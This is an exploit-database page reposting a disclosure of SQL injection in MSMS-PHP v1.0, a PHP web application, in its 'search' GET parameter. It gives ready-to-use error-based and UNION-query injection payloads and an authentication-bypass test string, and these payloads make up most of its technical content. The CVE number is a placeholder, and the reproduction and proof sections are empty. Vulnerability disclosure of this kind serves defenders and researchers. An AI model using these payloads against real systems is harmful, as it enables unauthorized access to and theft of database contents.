MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi

CVE Category Price Severity
CVE-2024-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
oretnom23 Critical Remote 2024-03-13
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/S:U/C:H/I:H/A:H 0.87654 0.75432

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

MSMS-PHP (by: oretnom23 - 2024) v1.0 Multiple-SQLi
## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor:
## Software:
## Reference:

## Description:
This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.
There is a change in response when nu11secur1ty' or 1=1# is injected.  
Potential SQLi detected. Please confirm it manually after you check the POST, GET, or other requests... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. The `search` parameter is vulnerable for Multiple SQLi attacks. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

Parameter: search (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: p=products&search=-9068') OR 1 GROUP BY CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0 END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: p=products&search=-7515') UNION ALL SELECT 2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#


## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.